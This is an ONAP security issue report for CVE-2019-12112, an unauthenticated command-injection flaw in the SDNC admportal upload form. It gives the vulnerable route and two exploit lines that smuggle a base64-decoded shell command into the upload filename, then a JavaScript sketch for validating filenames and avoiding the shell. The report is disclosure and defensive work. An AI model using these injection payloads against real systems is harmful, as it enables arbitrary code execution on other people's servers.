ONAP JIRA Security Issues / OJSI-199

SDNC service allows for arbitrary code execution in sla/upload form (CVE-2019-12112)


Details

    Description

      SDNC allows any user to execute arbitrary code through the upload form.
      Sample payload below.

      Path: oam/admportal/server/router/routes/sla.js:149

      Url: http://<IP>:30201/sla/upload

      Exploit: touch '|| echo L3RtcC9kZ1VwbG9hZA== | base64 -d | xargs touch #'
      Exploit: http -f 'http://<IP>:30201/sla/upload' filename@||\ echo\ L3RtcC9kZ1VwbG9hZA\=\=\ |\ base64\ -d\ |\ xargs\ touch#

      Impact description (draft)

      Title: SDNC service allows for arbitrary code execution in sla/dgUpload form

      Reporter: Jakub Botwicz, Wojciech Rauner, Łukasz Wrochna and Radosław Żeszczuk from Samsung

      Products: SDNC

      Affects: Casablanca and earlier

      Description:

      Jakub Botwicz, Wojciech Rauner, Łukasz Wrochna and Radosław Żeszczuk from Samsung reported a vulnerability in SDNC. By executing sla/upload with a crafted filename parameter, an unauthenticated attacker can execute an arbitrary command. All SDC setups that include admportal are affected.

      Note:

      The Dublin release is not vulnerable to this attack because the admportal has been disabled, but the code itself is still vulnerable.
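
A hardening sketch for this class of bug, added here as an example and not taken from the SDNC code base. It assumes the upload handler passes the client-supplied filename to a shell command, which the report implies but does not show; `safeUploadPath`, `echoViaArgv`, `isRejected` and the `/tmp/uploads` directory are hypothetical names.

```javascript
// Added example, not SDNC code. All function names and paths are hypothetical.
const path = require('node:path');
const { execFileSync } = require('node:child_process');

// Filename quoted in the report, plus a constructed benign name.
const REPORTED_NAME = '|| echo L3RtcC9kZ1VwbG9hZA== | base64 -d | xargs touch #';
const BENIGN_NAME = 'sla_2019.csv';

// Allowlist: letters, digits, dot, underscore, hyphen; no leading dot or hyphen.
const NAME_RE = /^[A-Za-z0-9_][A-Za-z0-9._-]{0,127}$/;

// Returns an absolute path inside uploadDir, or throws when the
// client-supplied name is not acceptable.
function safeUploadPath(uploadDir, clientName) {
  if (typeof clientName !== 'string' || !NAME_RE.test(clientName)) {
    throw new Error('rejected upload filename');
  }
  const base = path.resolve(uploadDir);
  const full = path.resolve(base, clientName);
  // Defense in depth: the resolved file must sit directly in the upload directory.
  if (path.dirname(full) !== base) throw new Error('path escapes upload directory');
  return full;
}

// Hands a value to a child process as a single argv element. execFile starts
// the program directly, without a shell, so |, #, = and spaces stay plain data.
function echoViaArgv(value) {
  const script = 'process.stdout.write(process.argv[process.argv.length - 1])';
  return execFileSync(process.execPath, ['-e', script, '--', value], { encoding: 'utf8' });
}

// Convenience wrapper: true when the validator refuses the name.
function isRejected(name) {
  try {
    safeUploadPath('/tmp/uploads', name);
    return false;
  } catch {
    return true;
  }
}
```

Validation and shell-free invocation are independent controls: the allowlist stops the reported filename at the boundary, and the argument vector keeps any name that does get through from being parsed as shell syntax.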

       


          People

            arotundo Alfred Rotundo
            kopasiak Krzysztof Opasiak